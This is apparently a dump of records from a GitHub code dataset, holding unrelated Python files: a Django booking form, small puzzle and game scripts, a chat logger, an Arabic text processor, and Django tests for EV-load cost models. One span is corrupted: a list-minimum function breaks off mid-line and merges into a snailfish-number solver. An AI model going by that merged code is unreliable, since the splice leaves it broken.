\"\"\"\n\n def __init__(self, *args, user=None, **kwargs):\n \"\"\"\n Initialize form with optional user data. 
Set 'user' attribute and\n        field initial values.\n        \"\"\"\n        self.user = user\n        super().__init__(*args, **kwargs)\n        self.fields['date'].initial = date.today()\n        self.fields['players'].initial = 1\n\n    date = forms.DateField(widget=forms.DateInput(\n        attrs={'class': 'form-control', 'type': 'date',\n               'min': datetime.today().date()}))\n    start_time = forms.TimeField(widget=forms.TimeInput(\n        attrs={'class': 'form-control', 'type': 'time', }))\n    end_time = forms.TimeField(widget=forms.TimeInput(\n        attrs={'class': 'form-control', 'type': 'time', }))\n    players = forms.IntegerField(widget=forms.NumberInput(\n        attrs={'class': 'form-control', 'min': '1', 'max': '4'}))\n\n    def clean(self):\n        \"\"\"\n        Clean and validate form data. Check for existing bookings,\n        time constraints, and errors.\n        \"\"\"\n        cleaned_data = super().clean()\n        date = cleaned_data.get('date')\n        start_time = cleaned_data.get('start_time')\n        end_time = cleaned_data.get('end_time')\n        # use the module-level datetime here; 'date' now holds the cleaned\n        # field value (possibly None), so calling date.today() on it is fragile\n        today = datetime.now().date()\n        time_now = datetime.now().time()\n\n        if date:\n            # Query for any existing bookings for the same date and user\n            existing_booking = Booking.objects.filter(\n                user_name=self.user,\n                booking_datetime__tee_datetime__date=date\n            ).first()\n\n            if existing_booking:\n                self.add_error(\n                    None, f\"\"\"You have already booked a tee time on {date}.\n                    You are only permitted to make one booking per day.\"\"\")\n\n        if date == today and start_time and start_time < time_now:\n            formatted_start_time = start_time.strftime('%H:%M')\n            formatted_time_now = time_now.strftime('%H:%M')\n            self.add_error(\n                None, f\"\"\"Your selected start time {formatted_start_time} is\n                in the past, please try again and select a start time\n                after {formatted_time_now}.\"\"\")\n\n        if start_time and end_time and start_time >= end_time:\n            self.add_error(\n                'end_time', 'End time must be later than start time.')\n\n    def get_available_tee_times(self):\n        \"\"\"\n        Get available tee times based on cleaned form data.\n        Query and filter TeeTime objects.\n        \"\"\"\n\n        date = self.cleaned_data.get('date')\n        start_time = self.cleaned_data.get('start_time')\n        end_time = self.cleaned_data.get('end_time')\n        players = self.cleaned_data.get('players')\n\n        tee_times = TeeTime.objects.filter(\n            tee_datetime__date=date,\n            tee_datetime__time__gte=start_time,\n            tee_datetime__time__lte=end_time,\n            max_players__gte=players,\n            available=True\n        ).order_by('tee_datetime')\n\n        for tee_time in tee_times:\n            tee_time.num_booked_players = tee_time.available_slots()\n\n        return tee_times\n","repo_name":"Oran-123/Hook-n-Slice-Golf","sub_path":"booking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13402417259","text":"# cook your dish here\nfor _ in range(int(input())) :\n    N = int(input())\n    nums = list(map(int, input().split()))\n    visited = {0:0, 1:0}\n    for i in nums :\n        if i%2 :\n            visited[1] += 1\n        else :\n            visited[0] += 1\n    print(visited[0]*visited[1])","repo_name":"Optider/CodeChef","sub_path":"UWCOI 2020 (United World College Olympiad in Informatics)/Button Pairs UWCOI20B.py","file_name":"Button Pairs UWCOI20B.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31918036963","text":"#Omar Shahwan 10/28/23 WORDLE\r\n#The following project codes a Wordle game in which the user tries to find what the hidden five-letter word is within six guesses.\r\n#User is prompted to input a word, given 
'Y' for letters in the word in a different place, 'G' for letters in the right place, and '_' for incorrect.\r\n\r\nimport random\r\n\r\nwords = [\"ABOUT\",\"AUDIO\",\"BAKED\",\"BINGE\",\"CLOUD\",\"COUCH\",\"FLARE\",\"FLOAT\",\"SNIPE\",\"STARE\"]\r\nanswer = random.choice(words)\r\n\r\ndef get_clue(ans, guess):\r\n clue = \"\"\r\n for idx, letter in enumerate(guess):\r\n if letter == ans[idx]:\r\n clue += \"G\"\r\n elif letter in ans:\r\n clue += \"Y\"\r\n else:\r\n clue += \"_\"\r\n return clue\r\n \r\nfor x in range(1,7):\r\n guess = input(\"Word? \")[0:5]\r\n guess = guess.upper()\r\n print (get_clue(answer, guess), x)\r\n if answer == guess:\r\n break\r\n","repo_name":"OmarShahwanGitHub/Wordle_1","sub_path":"Wordle.py","file_name":"Wordle.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26693777291","text":"class FlightData:\n #This class is responsible for structuring the flight data.\n def __init__(self, price, dep_iata, dest_iata, dest_city, dep_city, dep_date, ret_date, stop_overs=0,\n via_city=\"\"):\n self.price = price\n self.dep_iata = dep_iata\n self.dest_iata = dest_iata\n self.dep_city = dep_city\n self.dest_city = dest_city\n self.dep_date = dep_date\n self.ret_date = ret_date\n self.stop_overs = stop_overs\n self.via_city = via_city\n\n # def return_flight_data_dictionary(self):\n # return self.flight_data_dictionary\n # price, dep_city, dep_iata, dest_city, dest_iata, dep_date, return_date\n\n\n\n\n","repo_name":"nthnelliott857/100DaysOfCodeV2","sub_path":"Day39/flight-deals-start/flight_data.py","file_name":"flight_data.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43179689679","text":"# coding: utf-8\nfrom douyu.chat.room import ChatRoom\nimport time,os\nimport sys,conf\n\nf = open(str(conf.room_num)+'.txt','a+')\ndef on_chat_message(msg):\n\tos.environ['TZ']='Asia/Shanghai'\n\t#time.tzset()\n\tmsg_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\tuser = msg.attr('nn')\n\ttxt = msg.attr('txt')\n\tlevel = msg.attr('level')\n\td = \"[%s] [lv%s %s]:%s\\n\" % (msg_time,level,user,txt)\n\tf.write(d)\n\ndef run():\n\troom = ChatRoom(str(conf.room_num))\n\troom.on('chatmsg', on_chat_message)\n\troom.knock()\n\nif __name__ == '__main__':\n\trun()\n","repo_name":"Nan3r/douyutv","sub_path":"douyu.py","file_name":"douyu.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"8096166220","text":"import argparse\nimport aspell\n\nfrom nltk.stem.isri import ISRIStemmer\n\nar_spell = aspell.Speller(('dict-dir', './ar_ayspell_dict/'),\n ('lang', 'ar'),\n ('encoding', 'utf-8'))\n\n\ndef get_root_word(arabic_word):\n arabic_stemmer = ISRIStemmer()\n arabic_root = arabic_stemmer.stem(arabic_word)\n return arabic_root\n\n\ndef separate_waw(text):\n words = text.split()\n sentence = ''\n for word in words:\n if word.startswith('و'):\n root = get_root_word(word)\n if root.startswith('و'):\n sentence += word + ' '\n else:\n sentence += 'و ' + word[1:] + ' '\n print('{} changed to {}'.format(word, 'و ' + word[1:]))\n else:\n sentence += word + ' '\n return sentence\n\n\nparser = argparse.ArgumentParser(description='separate the '\n 'conjunction waw from '\n 'Arabic words')\n\nparser.add_argument('-i', '--infile', type=argparse.FileType(mode='r', encoding='utf-8'),\n 
help='input file.', required=True)\nparser.add_argument('-o', '--outfile', type=argparse.FileType(mode='w', encoding='utf-8'),\n help='out file.', required=True)\n\nif __name__ == '__main__':\n args = parser.parse_args()\n lines = args.infile.readlines()\n clean_lines = list()\n for line in lines:\n clean_lines.append(separate_waw(line))\n args.outfile.write('\\n'.join(clean_lines))\n","repo_name":"motazsaad/split-waw-arabic","sub_path":"process_waw_rooting.py","file_name":"process_waw_rooting.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"17484852811","text":"def acha_menor(lista):\n print(lista)\n menor = lista[0]\n local_menor = 0\n for i in range(len(lista)):\n #print(f\"Agora vou testar se lista[{i}], {lista[i]} > {maior}\")\n if lista[i] 9:\n return node\n else:\n return None\n return (\n find_splitting_node(node.left)\n or find_splitting_node(node.right)\n )\n\ndef reduce(tree):\n while 1:\n left, exploding_node, right = find_exploding_node(tree)\n if exploding_node:\n if left:\n left.value += exploding_node.left.value\n if right:\n right.value += exploding_node.right.value\n exploding_node.left = None\n exploding_node.right = None\n exploding_node.value = 0\n continue\n\n splitting_node = find_splitting_node(tree)\n if splitting_node:\n left = Node()\n right = Node()\n\n left.value = int(splitting_node.value / 2)\n right.value = int(0.5 + splitting_node.value / 2)\n\n splitting_node.value = None\n splitting_node.left = left\n splitting_node.right = right\n continue\n break\n \n return tree\n\ndef get_magnitude(node):\n if node.value is not None:\n return node.value\n return 3 * get_magnitude(node.left) + 2 * get_magnitude(node.right)\n\n\nnums = [parse_num(line) for line in data.splitlines()] # snailfish numbers as lists\ntrees = [make_tree(num) for num in nums] # snailfish numbers as trees\n\n\nfull_tree = trees[0]\nfor tree in trees[1:]:\n full_tree = add(full_tree, tree)\n full_tree = reduce(full_tree)\nprint(\"Part 1:\", get_magnitude(full_tree)) # 3305\n\n\nlargest_magnitude = 0\nfor num1 in nums:\n for num2 in nums:\n if num1 is num2:\n continue\n t1 = make_tree(num1)\n t2 = make_tree(num2)\n magnitude = get_magnitude(reduce(add(t1, t2)))\n largest_magnitude = max(largest_magnitude, magnitude)\nprint(\"Part 2:\", largest_magnitude) # 4563\n","repo_name":"yoggi-yalla/aoc2021","sub_path":"18/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74665313048","text":"#coding:utf-8\npath = 'D://李响//key_word//shiyan//sim//sim_xianguan_xiugai.txt'\npath_zl ='D://李响//key_word//shiyan//sim//sim_xianguan_zl.txt'\n\nsim_zl = open(path_zl,'w',encoding='utf-8')\nwith open(path,'r',encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n if(len(line) != 0):\n line = line.replace(\" \",\"\t\")\n sim_zl.write(line)\n sim_zl.write('\\n')\n\n\n\n\n\n\n\n","repo_name":"LawLietzh/workspacePy","sub_path":"py/gongZuo/sim_zhengli/sim_xianguan.py","file_name":"sim_xianguan.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37712587482","text":"import numpy as np\nfrom typing import List\n\n\nx_directions = [-1, 0, 1, 0]\ny_directions = [0, 1, 0, -1]\n\n\ndef is_valid(visited_array: np.ndarray, node_x: int, node_y: int) -> bool:\n if 0 
<= node_x < visited_array.shape[0] and \\\n 0 <= node_y < visited_array.shape[1] and \\\n visited_array[node_x, node_y] == False:\n return True\n else:\n return False\n\n\ndef find_neighbors(input_array: np.ndarray, visited_array: np.ndarray, node_x: int, node_y: int) -> np.ndarray:\n for i, j in zip(x_directions, y_directions):\n neighbor_x, neighbor_y = node_x+i, node_y+j\n valid = is_valid(visited_array, neighbor_x, neighbor_y)\n if not valid:\n continue\n visited_array[neighbor_x, neighbor_y] = True\n if input_array[neighbor_x, neighbor_y] == 1:\n visited_array = find_neighbors(input_array, visited_array, neighbor_x, neighbor_y)\n return visited_array\n\n\ndef find_islands(input_array: List[List[int]]) -> int:\n input_array = np.array(input_array)\n visited_array = np.zeros(input_array.shape, dtype=bool)\n candidates = np.array(np.where(input_array == 1)).T\n n_islands = 0\n for candidate in candidates:\n candidate_x, candidate_y = candidate\n valid = is_valid(visited_array, candidate_x, candidate_y)\n if not valid:\n continue\n visited_array = find_neighbors(input_array, visited_array, candidate_x, candidate_y)\n n_islands += 1\n return n_islands\n","repo_name":"mmezyk/coding-exercises","sub_path":"python-algorithms-counting-islands/island_finder.py","file_name":"island_finder.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2174545651","text":"from django.test import TestCase\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\nfrom rest_framework.test import APITestCase\nfrom script.models.enums import DayType, POI, AggregationLevel\nfrom script.models.data import County\nfrom script.models.config import LoadControllerConfig, LoadForecastConfig, LoadProfileConfig, GasConsumptionConfig, NetPresentValueConfig, CostBenefitConfig, EmissionConfig\nfrom script.models.algorithms import LoadController, LoadForecast, LoadProfile, GasConsumption, CostBenefit, NetPresentValue, Emission, LoadForecastConfig\nfrom script.tests.utils import create_load_controller_config, create_load_forecast_config, create_load_profile_config, create_cost_benefit_config, create_emission_config, create_gas_consumption_config, create_net_present_value_config\nfrom script.tests.utils import create_county, create_load_controller, create_load_forecast, create_load_profile, create_gas_consumption, create_cost_benefit, create_net_present_value, create_emission\n\nfrom script.tests.test_data import CountyTests\nfrom script.tests.test_config import LoadControllerConfigTests, LoadForecastConfigTests, LoadProfileConfigTests, GasConsumptionConfigTests, NetPresentValueConfigTests, CostBenefitConfigTests, EmissionConfigTests\n\nimport json\nimport copy\n\nclass LoadControllerTests(APITestCase):\n\n uncontrolled_load = [\n {\n 'time': '05:30',\n 'load': '134'\n },\n {\n 'time': '05:45',\n 'load': '323'\n },\n {\n 'time': '06:00',\n 'load': '413'\n }\n ]\n controlled_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n\n def test_create_load_controller(self):\n \"\"\"Ensure we can create a new load controller object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_controller_config(CountyTests.county_name,\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n 
LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n config = LoadControllerConfig.objects.get()\n response = create_load_controller(config,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(LoadController.objects.count(), 1)\n obj = LoadController.objects.get()\n self.assertEqual(obj.config.county.name, CountyTests.county_name)\n self.assertEqual(json.loads(obj.uncontrolled_load), self.uncontrolled_load)\n self.assertEqual(json.loads(obj.controlled_load), self.controlled_load)\n\n def test_create_conflict(self):\n \"\"\"Ensure we cannot create two load controllers with the same config.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_controller_config(CountyTests.county_name,\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n config = LoadControllerConfig.objects.get()\n response = create_load_controller(config,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n response = create_load_controller(config,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_filter_config(self):\n \"\"\"Ensure we can filter load controllers by fields: config.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_county('Palo Alto',\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_controller_config(CountyTests.county_name,\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n _ = create_load_controller_config('Palo Alto',\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n county1 = County.objects.get(pk=CountyTests.county_name)\n config1 = LoadControllerConfig.objects.filter(county=county1)[0]\n response = create_load_controller(config1,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n county2 = County.objects.get(pk='Palo Alto')\n config2 = LoadControllerConfig.objects.filter(county=county2)[0]\n new_controlled_load = copy.deepcopy(self.controlled_load)\n new_controlled_load[0]['load'] = '110'\n response = create_load_controller(config2,\n json.dumps(self.uncontrolled_load),\n json.dumps(new_controlled_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n url = reverse('algorithm/load_controller-list')\n data = {\n 'config': config1.id\n }\n response = self.client.get(url, 
data)\n obj = json.loads(response.content)[0]\n config = LoadControllerConfig.objects.get(id=obj['config'])\n self.assertEqual(config.county.name, CountyTests.county_name)\n self.assertEqual(json.loads(obj['controlled_load']), self.controlled_load)\n\n\nclass LoadForecastTests(APITestCase):\n\n residential_l1_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n residential_l2_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '3230'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n residential_mud_load = [\n {\n 'time': '05:30',\n 'load': '1303'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n work_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '3220'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n fast_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '3120'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n public_l2_load = [\n {\n 'time': '05:30',\n 'load': '1330'\n },\n {\n 'time': '05:45',\n 'load': '3210'\n },\n {\n 'time': '06:00',\n 'load': '4110'\n }\n ]\n total_load = [\n {\n 'time': '05:30',\n 'load': '1130'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '4120'\n }\n ]\n\n def test_create_load_forecast(self):\n \"\"\"Ensure we can create a new EV load forecast object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n config = LoadForecastConfig.objects.get()\n response = create_load_forecast(config,\n json.dumps(self.residential_l1_load),\n json.dumps(self.residential_l2_load),\n json.dumps(self.residential_mud_load),\n json.dumps(self.work_load),\n json.dumps(self.fast_load),\n json.dumps(self.public_l2_load),\n json.dumps(self.total_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(LoadForecast.objects.count(), 1)\n obj = LoadForecast.objects.get()\n self.assertEqual(obj.config.config_name, LoadForecastConfigTests.config_name)\n self.assertEqual(obj.config.aggregation_level, LoadForecastConfigTests.aggregation_level.name)\n self.assertEqual(json.loads(obj.residential_l1_load), self.residential_l1_load)\n self.assertEqual(json.loads(obj.total_load), self.total_load)\n\n\nclass LoadProfileTests(APITestCase):\n loads = [i * 2 % 24 + 1 for i in range(24)]\n\n def test_create_load_profile(self):\n \"\"\"Ensure we can create a new load profile object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = 
LoadForecastConfig.objects.get()\n _ = create_load_profile_config(lf_config,\n LoadProfileConfigTests.poi,\n LoadProfileConfigTests.year,\n LoadProfileConfigTests.day_type)\n config = LoadProfileConfig.objects.get()\n response = create_load_profile(config, json.dumps(self.loads))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(LoadProfile.objects.count(), 1)\n obj = LoadProfile.objects.get()\n self.assertEqual(obj.config.lf_config.config_name, LoadForecastConfigTests.config_name)\n self.assertEqual(obj.config.poi, LoadProfileConfigTests.poi.name)\n self.assertEqual(json.loads(obj.loads), self.loads)\n\n\nclass GasConsumptionTests(APITestCase):\n\n consumption = {\n 'Gasoline_Consumption_gallons': 545619941.6,\n 'Gasoline_Consumption_MMBTU': 65734108089476.5,\n 'Gasoline_Emissions_CO2': 4637769.504,\n 'PHEV_10_Gasoline_Consumption_gallons': 24929.58517,\n 'PHEV_10_Gasoline_Consumption_MMBTU': 3003416703,\n 'PHEV_10_Gasoline_Emissions_CO2': 211.9014739,\n 'PHEV_20_Gasoline_Consumption_gallons': 69108.54055,\n 'PHEV_20_Gasoline_Consumption_MMBTU': 8325920531,\n 'PHEV_20_Gasoline_Emissions_CO2': 587.4225947,\n 'PHEV_40_Gasoline_Consumption_gallons': 95172.95918,\n 'PHEV_40_Gasoline_Consumption_MMBTU': 11466057430,\n 'PHEV_40_Gasoline_Emissions_CO2': 808.970153,\n 'BEV_100_Gasoline_Consumption_gallons': 67142.92642,\n 'BEV_100_Gasoline_Consumption_MMBTU': 8089111204,\n 'BEV_100_Gasoline_Emissions_CO2': 570.7148746,\n 'EV_Share': 0.001533283\n }\n\n def test_create_gas_consumption(self):\n \"\"\"Ensure we can create a new gas consumption object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_gas_consumption_config(lf_config, GasConsumptionConfigTests.year)\n config = GasConsumptionConfig.objects.get()\n response = create_gas_consumption(config, json.dumps(self.consumption))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(GasConsumption.objects.count(), 1)\n obj = GasConsumption.objects.get()\n self.assertEqual(obj.config.year, GasConsumptionConfigTests.year)\n self.assertEqual(json.loads(obj.consumption), self.consumption)\n\n\nclass CostBenefitTests(APITestCase):\n\n cost_benefit = {\n 'Utility_Bills': 1643285.189,\n 'Utility_Bills_res': 1574878.503,\n 'Utility_Bills_work': 27523.12322,\n 'Utility_Bills_pub_L2': 40883.56269,\n 'Utility_Bills_DCFC': 0,\n 'Incremental_upfront_vehicle_cost': 15713196.73,\n 'Charging_infrastructure_cost':\t4573543.239,\n 'Charging_infrastructure_cost_res':\t2920300,\n 'Charging_infrastructure_cost_work_L2':\t632882.3529,\n 'Charging_infrastructure_cost_public_L2': 430360,\n 'Charging_infrastructure_cost_DCFC': 590000.8865,\n 'Avoided_vehicle_gasoline ($)':\t4604521.161,\n 'Avoided_vehicle_gasoline (gallons)': 2029634.905,\n 'Vehicle_O&M_Savings': 307236,\n 'Federal_EV_Tax_Credit': 10166700,\n 'Vehicle_sales': 1537,\n 'Transmission_and_Distribution_Cost': 127854.8147,\n 'Distribution_Cost': 87146.31329,\n 'Transmission_Cost': 40708.50144,\n 
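# The remaining entries below track cumulative EV adoption, 5-9 PM peak demand, and energy supply costs.\n 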
'Cumulative_personal_light-duty_EV_population':\t6878,\n 'Cumulative_personal_light-duty_LDV_population': 1293819,\n 'EV_sales_as_percentage_of_total_personal_light-duty_vehicles':\t0.001187956,\n 'Peak_Demand_5-9_PM': 6.913490911,\n 'Energy_Supply_Cost': 687051.7026,\n 'Energy_Cost': 531222.3664,\n 'Capacity_Cost': 155829.3361\n }\n\n def test_create_cost_benefit(self):\n \"\"\"Ensure we can create a new cost benefit object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_cost_benefit_config(lf_config, CostBenefitConfigTests.year)\n config = CostBenefitConfig.objects.get()\n response = create_cost_benefit(config, json.dumps(self.cost_benefit))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(CostBenefit.objects.count(), 1)\n obj = CostBenefit.objects.get()\n self.assertEqual(obj.config.year, CostBenefitConfigTests.year)\n self.assertEqual(json.loads(obj.cost_benefit), self.cost_benefit)\n\n\nclass NetPresentValueTests(APITestCase):\n\n net_present_value = {\n 'Utility_Bills': 250514400.4,\n 'Utility_Bills_volumetric':\t250059210.3,\n 'Utility_Bills_demand':\t455190.0426,\n 'Utility_Bills_res': 240325818.2,\n 'Utility_Bills_work': 4088140.725,\n 'Utility_Bills_pub_L2':\t6100441.406,\n 'Utility_Bills_DCFC': 0,\n 'Incremental_upfront_vehicle_cost':\t91394525.43,\n 'Charging_infrastructure_cost': 324375153.1,\n 'Charging_infrastructure_cost_res':\t207241475.2,\n 'Charging_infrastructure_cost_work_L2':\t44902567.99,\n 'Charging_infrastructure_cost_public_L2': 30533746.23,\n 'Charging_infrastructure_cost_DCFC': 41697363.66,\n 'Avoided_vehicle_gasoline':\t802838445.2,\n 'Vehicle_O&M_Savings': 207528684.2,\n 'Federal_EV_Tax_Credit': 121338516.8,\n 'Energy_Supply_Cost': 80844635.85,\n 'Energy_Cost': 80844635.85,\n 'Generation_Capacity_Cost':\t23490407.75,\n 'Vehicle_Sales': 132772.6619,\n 'Transmission_and_Distribution_Cost': 15056754.47,\n 'Distribution_Cost': 8905317.194,\n 'Transmission_Cost': 6151437.278\n }\n\n def test_create_net_present_value(self):\n \"\"\"Ensure we can create a new net present value object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_net_present_value_config(lf_config, NetPresentValueConfigTests.year)\n config = NetPresentValueConfig.objects.get()\n response = create_net_present_value(config, json.dumps(self.net_present_value))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(NetPresentValue.objects.count(), 1)\n obj = NetPresentValue.objects.get()\n 
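# Verify the saved record round-trips: the config year and the JSON-encoded NPV payload should match what was submitted.\n 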
self.assertEqual(obj.config.year, NetPresentValueConfigTests.year)\n self.assertEqual(json.loads(obj.npv), self.net_present_value)\n\n\nclass EmissionTests(APITestCase):\n\n emissions = {\n 'CO2_emissions': 11809.74895,\n 'NOX_emissions': 8.537033476,\n 'PM_10_emissions': 0.41418928,\n 'SO2_emissions': 2.786595841,\n 'VOC_emissions': 0.13171142\n }\n\n def test_create_emission(self):\n \"\"\"Ensure we can create a new emission object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_emission_config(lf_config, EmissionConfigTests.year)\n config = EmissionConfig.objects.get()\n response = create_emission(config, json.dumps(self.emissions))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Emission.objects.count(), 1)\n obj = Emission.objects.get()\n self.assertEqual(obj.config.year, EmissionConfigTests.year)\n self.assertEqual(json.loads(obj.emissions), self.emissions)\n","repo_name":"slacgismo/SCRIPT-tool","sub_path":"webserver/script/tests/test_algorithms.py","file_name":"test_algorithms.py","file_ext":"py","file_size_in_byte":24051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"8094183693","text":"import csv\nimport random\ndef create_phonebook(n):\n \"\"\" creates n text files in the current directory,\n each containing a first name, last name,\n and a phone number.\n \"\"\"\n numbers = phone_number_generator(n) #a list of phone numbers\n first_names = csv_to_list('firstNames.csv') #list of possible first names\n last_names = csv_to_list('lastNames.csv') 